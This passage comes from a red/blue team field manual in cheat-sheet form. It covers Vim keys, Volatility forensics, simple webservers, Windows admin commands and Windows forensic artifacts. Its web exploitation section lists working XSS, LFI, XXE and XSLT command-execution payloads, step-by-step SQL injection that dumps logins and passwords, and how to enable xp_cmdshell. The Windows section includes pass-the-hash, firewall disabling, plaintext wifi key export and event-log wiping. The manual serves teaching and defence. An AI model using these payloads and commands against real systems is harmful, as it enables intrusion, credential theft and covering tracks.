b jump backwards to the start of a word
B jump backwards to the start of a word
0 jump to the start of the line
^ jump to first non-blank char of line
$ jump to the end of the line
g_ jump to last non-blank char of line
gg go to the first line of the document
G go to the last line of the document
5G go to line 5
fx jump to next occur of character x
tx jump to before next occur of char x
} jump to next paragraph
{ jump to previous paragraph
zz center cursor on screen
Ctrl + b move back one full screen
Ctrl + f move forward one full screen
Ctrl + d move forward 1/2 a screen
Ctrl + u move back 1/2 a screen
INSERT MODE
i insert before the cursor
I insert at the beginning of the line
a insert (append) after the cursor
A insert (append) at end of the line
o append (open) new line below current line
append (open) a new line above the current
O line
ea insert (append) at the end of the word
Esc exit insert mode
EDITING
r replace a single character
J join line below to the current one
cc change (replace) entire line
change (replace) to the start of the next
cw word
change (replace) to the end of the next
ce word
change (replace) to the start of the
cb previous word
c0 change (replace) to the start of the line
c$ change (replace) to the end of the line
s delete character and substitute text
delete line and substitute text (same as
S cc)
xp transpose two letters (delete and paste)
. repeat last command
u undo
Ctrl + r redo
MARKING TEXT

315
v start visual mode
V start linewise visual mode
o move to other end of marked area
O move to other corner of block
aw mark a word
ab a block with ()
aB a block with {}
ib inner block with ()
iB inner block with {}
Esc exit visual mode
Ctrl + v start visual block mode
VISUAL CMDS
> shift text right
< shift text left
y yank (copy) marked text
d delete marked text
~ switch case
CUT/PASTE
yy yank (copy) a line
2yy yank (copy) 2 lines
yank (copy) chars from the cursor start of
yw next word
y$ yank (copy) to end of line
p put (paste) the clipboard after cursor
P put (paste) before cursor
dd delete (cut) a line
2dd delete (cut) 2 lines
delete (cut) chars from cursor to start of
dw next word
D delete (cut) to the end of the line
d$ delete (cut) to the end of the line
delete (cut) to the first non-blank
d^ character of the line
d0 delete (cut) to the begining of the line
x delete (cut) character
SEARCH/REPLACE
/pattern search for pattern
?pattern search backward for pattern
extended pattern: non-alphanumeric chars
\vpattern treated as regex
n repeat search in same direction
N repeat search in opposite direction
:%s/old/new/g replace all old with new throughout file
replace all old with new throughout file
:%s/old/new/gc with confirmations
:noh remove highlighting of search matches
SEARCH MULTI FILES
:vimgrep /pattern/
{file} search for pattern in multiple files
:cn jump to the next match

316
 :cp jump to the previous match
open a window containing the list of
:copen matches
EXITING
:w write (save) the file
:w !sudo tee % write out the current file using sudo
:wq or :x or ZZ write (save) and quit
:q quit (fails if there are unsaved changes)
:q! or ZQ quit and throw away unsaved changes
WORK MULTI FILES
:e file edit a file in a new buffer
:bnext or :bn go to the next buffer
:bprev or :bp go to the previous buffer
:bd delete a buffer (close a file)
:ls list all open buffers
open a file in a new buffer and split
:sp file window
open a file in a new buffer and vertically
:vsp file split window
Ctrl + ws split window
Ctrl + ww switch windows
Ctrl + wq quit a window
Ctrl + wv split window vertically
move cursor to the left window (vertical
Ctrl + wh split)
move cursor to the right window (vertical
Ctrl + wl split)
move cursor to the window below (horizontal
Ctrl + wj split)
move cursor to the window above (horizontal
Ctrl + wk split)
TABS
:tabnew or :tabnew
file open a file in a new tab
move the current split window into its own
Ctrl + wT tab
gt or :tabnext
or :tabn move to the next tab
gT or :tabprev
or :tabp move to the previous tab
<number>gt move to tab <number>
move current tab to the <$>th position
:tabmove <number> (indexed from 0)
:tabclose or :tabc close the current tab and all its windows
:tabonly or :tabo close all tabs except for the current one
:tabdo command run the command on all tabs
:tabdo q run the command all tabs then close

REFERENCE:
[Link]

317
V V
VOLATILITY
RED/BLUE TEAM FORENSICS WINDOWS/LINUX/MacOS
Volatility is an open-source memory forensics framework for
incident response and malware analysis. It is written in Python and
supports Microsoft Windows, Mac OS X, and Linux. Releases are
available in zip and tar archives, Python module installers, and
standalone executables.

COMMAND DESCRIPTION
[Link] -f image--profile=profileplugin Sample command format
[Link] -f [Link] timeliner --output- Timeliner plugin parses
file [Link]--output=body -- time-stamped objects
profile=Win10x64 found inmemory images.
Display memory image
[Link] –f [Link] imageinfo metadata
Find API/DLL function
[Link] apihooks hooks
Map ASEPs to running
[Link] autoruns -v processes
Scan for
[Link] cmdscan COMMAND_HISTORY buffers
Scan for
CONSOLE_INFORMATION
[Link] consoles output
[Link] dlldump --dump-dir ./output –r Extract DLLs from
<dll> specific processes
List of loaded dlls by
[Link] dlllist –p ### process by PID
Identify I/O Request
[Link] driverirp –r tcpip Packet (IRP) hooks
[Link] dumpfiles-n -i -r \\.exe --dump- Extract FILE_OBJECTs
dir=./ from memory
Extract all available
[Link] dumpregistry--dump-dir ./output registry hives
Scan memory for
[Link] filescan FILE_OBJECT handles
Print process security
[Link] getsids –p ### identifiers by PID
List of open handles
for each process
{Process, Thread, Key,
Event, File, Mutant,
[Link] handles –p ### –t File,Key Token, Port}
Dump user NTLM and
[Link] hashdump Lanman hashes

318
 Print all keys and
subkeys in a hive. -o
Offset of registry hive
to dump (virtual
[Link] hivedump –o 0xe1a14b60 offset)
Find and list available
[Link] hivelist registry hives
Detect process
[Link] hollowfind-D ./output_dir hollowing techniques
Display Interrupt
[Link] idt Descriptor Table
[Link] imagecopy -f [Link] -O Convert alternate
[Link] --profile=Win7SP1x64 memory sources to raw
[Link] imagecopy -f [Link] -O
[Link] –- Convert alternate
profile=Win2016x64_14393 memory sources to raw
[Link] ldrmodules –p ### -v Detect unlinked DLLs
Find possible malicious
injected code and dump
[Link] malfind --dump-dir ./output_dir sections
[Link] memdump –-dump-dir ./output –p Extract every memory
### section into onefile
[Link] moddump --dump-dir ./output –r
<driver> Extract kernel drivers
Scan memory for loaded,
unloaded, and unlinked
[Link] modscan drivers
Scan for TCP
[Link] netscan connections and sockets
[Link] printkey – Output a registry key,
K“Microsoft\Windows\CurrentVersion\Run” subkeys, and values
[Link] procdump --dump-dir ./output –p Dump process to
### executable sample
High level view of
[Link] pslist running processes
Display parent-process
[Link] pstree relationships
Find hidden processes
[Link] psxview using cross-view
Hooks in System Service
[Link] ssdt Descriptor Table
Scan for Windows
Service record
[Link] svcscan-v structures
Find and parse
[Link] userassist userassist key values
Scan memory for
[Link] EPROCESS blocks

REFERENCE:

319
[Link]
[Link]
[Link]
[Link]

W
W W
WEB_Exploit
RED TEAM ENUM/SQLI/XSS/XXE WEB

Web Enumeration
Dirsearch
dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old
dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old -w
path/to/wordlist
dirsearch -u [Link] -e .

dirb
dirb [Link] /path/to/wordlist

dirb [Link] /path/to/wordlist -

X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old

Gobuster
gobuster -u [Link] -w /usr/share/wordlists/dirb/[Link]

LFI (Local File Inclusion)

320
Vulnerable parameter
[Link]

Ways to Check/Verify/Test
[Link]
encode/resource=index

[Link]

[Link]

Search for a LFI Payloads:

Payload All the Things
[Link]
e%20Inclusion/Intruders
Seclist LFI Intruder
[Link]

XSS Reflected
Simple XSS Tests
<script>alert('Found')</script>

"><script>alert(Found)</script>">

<script>alert([Link](88,83,83))</script>

Bypass filter of tag script

" onload="alert([Link](88,83,83))

" onload="alert('XSS')

<img src='bla' onerror=alert("XSS")>

Persistent
>[Link]="<style>body{visibility:hidden;}</style><d
iv style=visibility:visible;><h1>HELLOWORLD!</h1></div>";

Download via XSS

<iframe src="[Link] height="0"
width="0"></iframe>

Search for XSS payloads:

Payload All The Things
[Link]
%20Injection

321
Seclist XSS
[Link]

XML VULNERABILITIES
XML External Entities expansion / XXE
XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML
input containing a reference to an external entity is processed by
a weakly configured XML parser. This attack may lead to the
disclosure of confidential data, denial of service, server side
request forgery, port scanning from the perspective of the machine
where the parser is located, and other system impacts.

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "[Link] >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "[Link] >]><foo>&xxe;</foo>

<?xml version="1.0" ?>

<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "[Link]
]>
<r>&sp;</r>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "[Link] >]><foo>&xxe;</foo>

Other XXE payloads worth testing:

XXE-Payloads
[Link]
Blind-XXE-Payload
[Link]

DTD Retrieval
Some XML libraries like Python's [Link] retrieve document
type definitions from remote or local locations. Several attack
scenarios from the external entity case apply to this issue as
well.

<?xml version="1.0" encoding="utf-8"?>

322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"[Link]
<html>
<head/>
<body>text</body>
</html>

Decompression Bomb
Decompression bombs (aka ZIP bomb) apply to all XML libraries that
can parse compressed XML streams such as gzipped HTTP streams or
LZMA-compressed files. For an attacker it can reduce the amount of
transmitted data by three magnitudes or more.

$ dd if=/dev/zero bs=1M count=1024 | gzip > [Link]

$ dd if=/dev/zero bs=1M count=1024 | lzma -z > [Link]
$ ls -sh zeros.*
1020K [Link]
148K [Link]

XPath Injection
XPath injection attacks pretty much work like SQL injection
attacks. Arguments to XPath queries must be quoted and validated
properly, especially when they are taken from the user. The page
Avoid the dangers of XPath injection list some ramifications of
XPath injections.

XInclude
XML Inclusion is another way to load and include external files:
<root xmlns:xi="[Link]
<xi:include href="[Link]" parse="text" />
</root>

This feature should be disabled when XML files from an untrusted

source are processed. Some Python XML libraries and libxml2 support
XInclude but don't have an option to sandbox inclusion and limit it
to allowed directories.

XSL Transformation
You should keep in mind that XSLT is a Turing complete language.
Never process XSLT code from unknown or untrusted source! XSLT
processors may allow you to interact with external resources in
ways you can't even imagine. Some processors even support
extensions that allow read/write access to file system, access to
JRE objects or scripting with Jython.

Example from Attacking XML Security for Xalan-J:

<xsl:stylesheet version="1.0"
xmlns:xsl="[Link]
xmlns:rt="[Link]
xmlns:ob="[Link]

323
 exclude-result-prefixes= "rt ob">
<xsl:template match="/">
<xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
<xsl:variable name="command"
select="rt:exec($runtimeObject,
&apos;c:\Windows\system32\[Link]&apos;)"/>
<xsl:variable name="commandAsString"
select="ob:toString($command)"/>
<xsl:value-of select="$commandAsString"/>
</xsl:template>
</xsl:stylesheet>

Manual SQLInjection

Simple test adding a simpe quote '

[Link]

Fuzzing sorting columns to find maximum column

[Link] order by 1
[Link] order by 2
[Link] order by 3
…until errors stop

Finding what column is injectable

MYSQL
[Link] union select 1, 2, 3
(using the same amount of columns you got on the previous step)

POSTGRES
[Link] union select NULL, NULL, NULL
(using the same amount of columns you got on the previous step)
One of the columns will be printed with the respective number

Finding version
MYSQL
[Link] union select 1, 2, version()

POSTGRES
[Link] union select NULL, NULL, version()

Finding database name

MYSQL
[Link] union select 1,2, database()

postgres
[Link] union select NULL,NULL, database()

324
Finding usernames logged in
MYSQL
[Link] union select 1, 2, current_user()

Finding databases
MYSQL
[Link] union select 1, 2, schema_name from
information_schema.schemata

POSTGRES
[Link] union select 1, 2, datname from
pg_database

Finding table names from a database

MYSQL
[Link] union select 1, 2, table_name from
information_schema.tables where table_schema="database_name"

POSTGRES
[Link] union select 1, 2, tablename from
pg_tables where table_catalog="database_name"

Finding column names from a table

MYSQL
[Link] union select 1, 2, column_name from
information_schema.columns where table_schema="database_name" and
table_name="tablename"

POSTGRES
[Link] union select 1, 2, column_name from
information_schema.columns where table_catalog="database_name" and
table_name="tablename"

Concatenate
MYSQL
[Link] union select 1, 2,
concat(login,':',password) from users;

POSTGRES
[Link] union select 1, 2, login||':'||password
from users;

Error Based SQLI (USUALLY MS-SQL)

Current user

325
[Link] or 1 in (SELECT TOP 1 CAST(user_name() as
varchar(4096)))--

DBMS version
[Link] or 1 in (SELECT TOP 1 CAST(@@version as
varchar(4096)))--

Database name
[Link] or db_name(0)=0 --

Tables from a database

[Link] or 1 in (SELECT TOP 1 CAST(name as
varchar(4096)) FROM dbname..sysobjects where xtype='U')--

[Link] or 1 in (SELECT TOP 1 CAST(name as

varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT
IN ('previouslyFoundTable',...))--

Columns within a table

[Link] or 1 in (SELECT TOP 1
CAST(dbname..[Link] as varchar(4096)) FROM
dbname..syscolumns, dbname..sysobjects WHERE
dbname..[Link]=dbname..[Link] AND
dbname..[Link] = 'tablename')--
**Remember to change dbname and tablename accordingly with the
given situation after each iteration a new column name will be
found, make sure add it to ** previously found column name **
separated by comma as on the next sample

[Link] or 1 in (SELECT TOP 1

CAST(dbname..[Link] as varchar(4096)) FROM
dbname..syscolumns, dbname..sysobjects WHERE
dbname..[Link]=dbname..[Link] AND
dbname..[Link] = 'tablename' AND dbname..[Link]
NOT IN('previously found column name', ...))--

Actual data
[Link] or 1 in (SELECT TOP 1 CAST(columnName as
varchar(4096)) FROM tablename)--
**After each iteration a new column name will be found, make sure
add it to ** previously found column name ** separated by comma as
on the next sample

[Link] or 1 in (SELECT TOP 1 CAST(columnName as

varchar(4096)) FROM tablename AND name NOT IN('previously found row
data'))--

Shell commands

326
EXEC master..xp_cmdshell <command>
**Need to have 'sa' user privileges

Enabling shell commands

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC
sp_congigure 'xp_shell', 1; RECONFIGURE;

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

ONLINE TOOLS
UNFURL
Takes a URL and expands ("unfurls") it into a directed graph,
extracting every bit of information from the URL and exposing the
obscured.
[Link]
[Link]

W W
WEBSERVER_Tricks
ALL INFORMATIONAL WINDOWS
Create a rudimentary webserver with various programming languages.

Create a webserver in AWK:

#!/usr/bin/gawk -f
BEGIN {
RS = ORS = "\r\n"
HttpService = "/inet/tcp/8080/0/0"
Hello = "<HTML><HEAD>" \
"<TITLE>A Famous Greeting</TITLE></HEAD>" \
"<BODY><H1>Hello, world</H1></BODY></HTML>"
Len = length(Hello) + length(ORS)
print "HTTP/1.0 200 OK" |& HttpService
print "Content-Length: " Len ORS |& HttpService
print Hello |& HttpService
while ((HttpService |& getline) > 0)
continue;
close(HttpService)
}

Create a webserver in Go:

327
package main

import (
"fmt"
"log"
"net/http"
)

func main() {
[Link]("/", func(w [Link], req
*[Link]) {
[Link](w, "Goodbye, World!")
})
[Link]([Link](":8080", nil))
}

Create a webserver in JavaScript:

Works with [Link]
var http = require('http');

[Link](function (req, res) {

[Link](200, {'Content-Type': 'text/plain'});
[Link]('Goodbye, World!\n');
}).listen(8080, '[Link]');

Create a webserver in Perl:

use Socket;

my $port = 8080;
my $protocol = getprotobyname( "tcp" );

socket( SOCK, PF_INET, SOCK_STREAM, $protocol ) or die "couldn't

open a socket: $!";
# PF_INET to indicate that this socket will connect to the
internet domain
# SOCK_STREAM indicates a TCP stream, SOCK_DGRAM would indicate
UDP communication

setsockopt( SOCK, SOL_SOCKET, SO_REUSEADDR, 1 ) or die "couldn't

set socket options: $!";
# SOL_SOCKET to indicate that we are setting an option on the
socket instead of the protocol
# mark the socket reusable

bind( SOCK, sockaddr_in($port, INADDR_ANY) ) or die "couldn't bind

socket to port $port: $!";
# bind our socket to $port, allowing any IP to connect

listen( SOCK, SOMAXCONN ) or die "couldn't listen to port $port:

$!";

328
 # start listening for incoming connections

while( accept(CLIENT, SOCK) ){

print CLIENT "HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
"<html><head><title>Goodbye,
world!</title></head><body>Goodbye, world!</body></html>\r\n";
close CLIENT;
}

Create a webserver using PHP:

<?php
// AF_INET6 for IPv6 // IP
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to
create socket!');
// '[Link]' to limit only to localhost // Port
socket_bind($socket, 0,
8080);
socket_listen($socket);

$msg = '<html><head><title>Goodbye,
world!</title></head><body>Goodbye, world!</body></html>';

for (;;) {
// @ is used to stop PHP from spamming with error messages if
there is no connection
if ($client = @socket_accept($socket)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msg) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msg);
}
else usleep(100000); // limits CPU usage by sleeping after
doing every request
}
?>

Create a webserver using Python:

Using wsgiref.simple_server module (Python < 3.2)
from wsgiref.simple_server import make_server

def app(environ, start_response):

start_response('200 OK', [('Content-Type','text/html')])
yield b"<h1>Goodbye, World!</h1>"

server = make_server('[Link]', 8080, app)

server.serve_forever()

Using [Link] module (Python 3)

import threading

329
from [Link] import BaseHTTPRequestHandler, ThreadingHTTPServer

class HelloHTTPRequestHandler(BaseHTTPRequestHandler):

message = 'Hello World! 今日は'

def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.end_headers()
[Link]([Link]('utf-8'))
self.close_connection = True

def serve(addr, port):

with ThreadingHTTPServer((addr, port), HelloHTTPRequestHandler)
as server:
server.serve_forever(poll_interval=None)

if __name__ == '__main__':

addr, port = ('localhost', 80)

[Link](target=serve, args=(addr, port),

daemon=True).start()

try:
while True:
# handle Ctrl+C
input()

except KeyboardInterrupt:
pass

Create a webserver in UNIX shell:

while true; do { echo -e 'HTTP/1.1 200 OK\r\n'; echo 'Hello,
World!'; } | nc -l 8080; done

REFERENCE:
[Link]
[Link]
Service

W W

330
 WINDOWS_Commands
ALL ADMINISTRATION WINDOWS

COMMAND DESCRIPTION
Count the number of
<COMMAND> | find /c /v "" lines to StdOut
Show ARP table with
arp -a MACs
List cached
cmdkey /list credentials
Search directory for
dir /b /s <Directory>\<FileName> specific file
dism /online /disable-feature Disable a particular
/featurename:<feature name> feature installed
dism /online /Enable-Feature Install the Telnet
/FeatureName:TelnetClient service *ADMIN
List available
features for DISM
dism /online /get-features | more *ADMIN
Windows iterate over
files contents and
for /F %i in ([file-set]) do [command] do %i command
for /L %i in ([start],[step],[stop]) do Windows counting FOR
<command> loop
ipconfig /all Show IP configuration
ipconfig /displaydns Show DNS cache
Show domain password
net accounts /domain policy
Show Domain Admin
net group "Domain Admins" /domain users
List Domain
net group "Domain Controllers" /domain Controllers
net group /domain Show domain groups
net localgroup "Administrators" Show local Admins
Add a user to the
net localgroup "Administrators" user /add Admin local group
Show current mounted
net share shares
Show remote host
net share \\<IP> shares
net share cshare C:\<share> Share local folder
/GRANT:Everyone,FULL with everyone
Show time on remote
net time \\<IP> host
Establish NULL
session with remote
net use \\<IP>\ipc$ "" "/user:" host
Remote file system of
net use \\<IP>\ipc$ <PASS> /user:<USER>
IPC$

331
net use r: \\<IP>\ipc$ <PASS> Map remote drive to
/user:<DOMAIN>\<USER> local r: drive
Show users in local
net user /domain domain
net user <USER> <PASS> /add Add a user
Show host in local
net view /domain domain
Show hosts in
net view /domain:<DOMAIN> specified domain
Turn off Windows
netsh firewall set opmode disable Firewall
Configure DHCP for
netsh interface ip set address local dhcp interface
netsh interface ip set address local Configure LAN
static <IPaddr> <Netmask< <DefaultGW> 1 interface
netsh interface ip set dns local static Configure DNS server
<IPaddr> for LAN
netsh interface ip show interfaces List local interfaces
Export wireless
netsh wlan export profile key=clear
password in plaintext
Show local wireless
netsh wlan show profiles profiles
Look for port usage
netstat –ano <N> | find <port> every N seconds
Show all TCP/UDP
netstat –nao active ports and PIDs
Show detailed
netstat –s –p <tcp|udp|ip|icmp> protocol stats
Show all available
nslookup -type=any [Link] DNS records
Show DNS servers of
nslookup -type=ns [Link] domain
Perform reverse DNS
nslookup <IP> lookup
Perform a lookup with
nslookup <IP> <NAMESERVER> specific DNS server
Show A record of
nslookup [Link] domain
psexec /accepteula \\<IP> -c Copy & execute
C:\Tools\[Link] -u <DOMAIN>\<USER> - program on remote
p <PASS> host
psexec /accepteula \\<IP> -i -s Install software on
"[Link] /i [Link]" -c [Link] remote host
psexec /accepteula \\<IP> -s
c:\windows\system32\[Link] quickconfig Enable PowerShell on
-quiet 2>&1> $null remote host silently
Run command as system
psexec /accepteula \\<IP> -s [Link] on remote host

332
psexec /accepteula \\<IP> -u
<DOMAIN>\<USER> -p <LM:NTLM> [Link] /c Pass the hash run
dir c:\[Link] remote command
psexec /accepteula \\<IP> -u
<DOMAIN>\<USER> -p <PASS> -c -f Execute file on
\\<IP_2>\share\[Link] remote host
Get hostname of
psexec /accepteula \\<IP> hostname remote system
Get hostname of
psexec /accepteula \\<IP1>,<IP2>,<IP3> multiple remote
hostname systems
Add a key to remote
reg add \\<IP>\<RegDomain>\<Key> hosts registry
Export all subkeys/
reg export <RegDomain>\<Key> values from Registry
<[Link]> location
reg query \\<IP>\<RegDomain>\<Key> /v Query remote host for
<ValueName> registry key value
Robocopy directory
Robocopy /ipg:750 /z /tee \\<IP>\<SHARE> with bandwidth
\\<IP_2>\<SHARE> limitations
Robocopy <source> <destination> [file…] Example syntax
[options] robocopy
Copy all contents of
Robocopy C:\UserDir C:\DirBackup /E local directory
route print Show routing table
Run file as specified
runas /user:<USER> "[Link] [args]" user
SC create a remote
sc \\<IP> create <SERVICE> service on host
install windows
sc \\<IP> create <SERVICE> binpath= service written in C#
C:\Windows\System32\[Link] on remote host, with
start=auto obj=<DOMAIN>\<USER> user/pass it should
password=<PASS> run as
Query brief status of
sc query all services
Query brief status of
all services on
sc query \\<IP> remote host
Query the
configuration of a
specific service on
sc query \\<IP> <ServiceName> remote host
Query the
configuration of a
sc query <ServiceName> specific service
sc query state=all Show services
Show environment
set variables

333
systeminfo /S <IP> /U <DOMAIN\USER> /P Pull system info for
<PASS> remote host at IP
Force process id to
taskkill /PID ## /F stop
Show all processes &
tasklist /m DLLs
Remote host process
tasklist /S <IP> /v listing for IP
Show all processes &
tasklist /svc services
ver Get OS version
wmic <alias> <where> <verb> EXAMPLE
List all attributes
of all running
wmic /node:<IP> /user:<User> processes on remote
/password:<Pass> process list full host
wmic /node:<IP> process call create Execute file on
"\\<SMB_IP>\share\[Link]" remote system from
/user:<DOMAIN>\<USER> /password:<PASS> hosted SMB share
wmic /node:<IP> computersystem get User logged in on
username remote host
wmic logicaldisk list brief List logical disks
List Domain & Domain
Controller
wmic ntdomain list information
Execute specified
wmic process call create C:\<process> process
List all attributes
of all running
wmic process list full processes
Show all patches
wmic qfe applied
wmic startupwmic service Start wmic service
Copy remote dir to
xcopy /s \\<IP>\<dir> C:\<LocalDir> local

POWERSHELL COMMANDS
COMMAND DESCRIPTION
<PSCommand> | Convert-to-Html |
Out-File - FilePAth Convert output of command to
[Link] HTML report
<PSCommand> | Export-CSV |
C:\[Link] Export ouptut to CSV
<PSCommand> | Select-Object
<Field>, <Field2> | Export-CSV Expport only certain fields to
| C:\[Link] CSV
Adds content to the specified
items, such as adding words to
Add-Content a file.

334
Backup-SqlDatabase -
ServerINstance
“Computer\Instance” -Database
“Databasecentral” Create a backup of SQL database
Clear-Host Clear the console
Compare-Object Compares two sets of objects.
Copies an item from one
Copy-Item location to another.
List sizes of logical & mapped
gdr -PSProvider ‘FileSystem’ drives
get-childitem C:\Users -Force |
select Name Get users of the system
get-command Get all commands
Gets the content of the item at
Get-Content the specified location.
get-eventlog -list Get local eventlog status
get-executionpolicy Get current execution policy
get-help -name <Command> Get help about certain command
get-history Get local command history
get-localgroup | ft Name Get groups on the system
get-localgroupmember
Administrators | ft Name,
PrincipalSource Get users of admin group
get-localuser | ft Name,
Enabled,LastLogon Users last login
View all processes currently
Get-Process running
get-process <PID1>, <PID2> | Get certain processes
format-list * information and format output
Show all services on local
get-service system
get-service | Where-Object Show only running service on
{$_.Status -eq “Running”} local system
get-uptime Get local uptime
get-winevent -list Get all local event logs status
Groups objects that contain the
same value for specified
Group-Object properties.
Gets content from a web page on
Invoke-WebRequest the Internet.
Calculates the numeric
properties of objects, and the
characters, words, and lines in
Measure-Object string objects, such as files …
Moves an item from one location
Move-Item to another.
New-Item Creates a new item.
Remove-Item Deletes the specified items.

335
 Resolves the wildcard
characters in a path, and
Resolve-Path displays the path contents.
Resume-Job Restarts a suspended job
Writes or replaces the content
Set-Content in an item with new content.
set-executionpolicy - Bypass execution policy to
ExecutionPolicy allow all scripts
Changes the value of an item to
the value specified in the
Set-Item command.
Sets the current working
location to a specified
Set-Location location.
Set-Variable Sets the value of a variable.
Creates Windows PowerShell
commands in a graphical command
Show-Command window.
Sorts objects by property
Sort-Object values.
Starts a Windows PowerShell
Start-Job background job.
Starts one or more processes on
Start-Process the local computer.
Starts one or more stopped
Start-Service services.
stop-process -name "notepad" Stop the notepad process
Temporarily stops workflow
Suspend-Job jobs.
Suppresses the command prompt
until one or all of the Windows
PowerShell background jobs
Wait-Job running in the session are …
wevtutil el | Foreach-Object
{wevtutil cl "$_"} Delete all event log files
wevutil el List names of all logs
Selects objects from a
collection based on their
Where-Object property values.
Sends the specified objects to
the next command in the
pipeline. If the command is the
Write-Output last command in the pipeline,…

W W
WINDOWS_Defend
BLUE TEAM FORENSICS WINDOWS

336
Evidence Collection Order of Volatility (RFC3227)
• Registers, cache
• Routing table, arp cache, process table, kernel statistics,
memory
• Temporary file systems
• Disk
• Remote logging and monitoring data that is relevant to the
system in question
• Physical configuration, network topology
• Archival media

WINDOWS BLUE/DFIR TOOLS

Microsoft Attack Surface Analyzer
[Link]
Attack Surface Analyzer is a Microsoft-developed open source
security tool that analyzes the attack surface of a target system
and reports on potential security vulnerabilities introduced during
the installation of software or system misconfiguration.

GRR Rapid Response

[Link]
GRR Rapid Response is an incident response framework focused on
remote live forensics. GRR is a python client (agent) that is
installed on target systems, and python server infrastructure that
can manage and talk to clients.

WINDOWS ARTIFACTS
USB ACCESS - search timeline of USB device access on the system.
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR Class ID / Serial

#HKLM\SYSTEM\CurrentControlSet\Enum\USB VID / PID

Find Serial # and then look for "Friendly Name" to obtain the
Volume Name of the USB device.
HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices

Find Serial # to obtain the Drive Letter of the USB device

Find Serial # to obtain the Volume GUID of the USB device
HKLM\SYSTEM\MountedDevices

Key will ONLY be present if system drive is NOT an SSD.

Find Serial # to obtain the Volume Serial Number of the USB device
which will be in decimal and convert to hex.
You can find complete history of Volume Serial Numbers here, even
if the device has been formatted multiple times. The USB device’s

337
Serial # will appear multiple times, each with a different Volume
Serial Number generated on each format.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EMDMgmt

Using the VolumeGUID found in SYSTEM\MountedDevices, you can find

the user that actually mounted the USB device
[Link]\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Mount
points2
USB Times:
0064 = First time device connected
0066 = Last time device connected
0067 = Last removal time
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USB
iSerial #\Properties\{93ba6346-96a6-5078-2433-b1423a575b26}\####

Search for the device’s Serial # to show USB first device

connected:
XP C:\Windows\[Link]
Vista+ C:\Windows\inf\[Link]

PREFETCH - stores/caches code pages on last applications run

into .pf files to help apps launch quicker in the future.
Default Directory:
C:\Windows\Prefetch
Default File Structure: (exename)-(8char_hash).pf
Example File: [Link]

Registry Configuration:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management\PrefetchParameters
EnablePrefetcher value:
0 = Disabled
1 = Application launch prefetching enabled
2 = Boot prefetching enabled
3 = Applaunch and Boot enabled

POWERSHELL HISTORY - PowerShell command history typed in a terminal

Default File Location:
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_hi
[Link]

Disable History:
STEP 1- At the PowerShell terminal prompt type
$PS> SaveNothing
$PS> MaximumHistoryCount 0

JUMP LISTS - time of execution of an application or recently used.

Files are prepended with an AppIDs for an application.

338
Default Directory:
C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\Automatic
Destinations
C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\CustomDes
tinations
Jump List AppIDs:
[Link]
pList/Resources/[Link]

EMAIL ATTACHMENTS - local saved copies of email attachments

received when using an email client.
Outlook Default Directory:
C:\%USERPROFILE%\AppData\Local\Microsoft\Outlook
Thunderbird Default Directory:
C:\%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\

BROWSER DATA - metadata/artifacts/history for each local user

account as it relates to browser usage.

IE 8-9
C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\IEDownloadHistor
y\[Link]
IE 10-11
C:\%USERPROFILE%\AppData\Local\Microsoft\Windows\WebCache\WebCacheV
##.dat
Edge **
C:\%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxx
xx\AC\MicrosoftEdge\User\Default\DataStore\Data\<user>\xxxxx\DBStor
e\[Link]
C:\%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxx
x\AC\#!001\MicrosoftEdge\Cache\
C:\%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxx
x\AC\MicrosoftEdge\User\Default\Recovery\Active\
Firefox v3-25
C:\%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\<randomte
xt>.default\[Link]
Firefox v26+
C:\%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\<randomte
xt>.default\[Link]
Table:moz_annos
Chrome
C:\%USERPROFILE%\AppData\Local\Google\Chrome\User
Data\Default\History

**ESE databases can be viewed by EseDbViewer, ESEDatabaseView or

esedbexport tool.

339
IMAGE THUMBNAIL CACHE - images, office documents, &
directories/folders exist in thumbnail format in a database for
easy retrieval.
C:\%USERPROFILE%\AppData\Local\Microsoft\Windows\Explorer\thumbcach
e_*.db

WINDOWS SECURITY LOG EVENTS

HUNTING EVENT_ID CATEGORIES
LOGON: 4611, 4624, 4648, 4776, 4778
LOGOFF: 4643, 4779
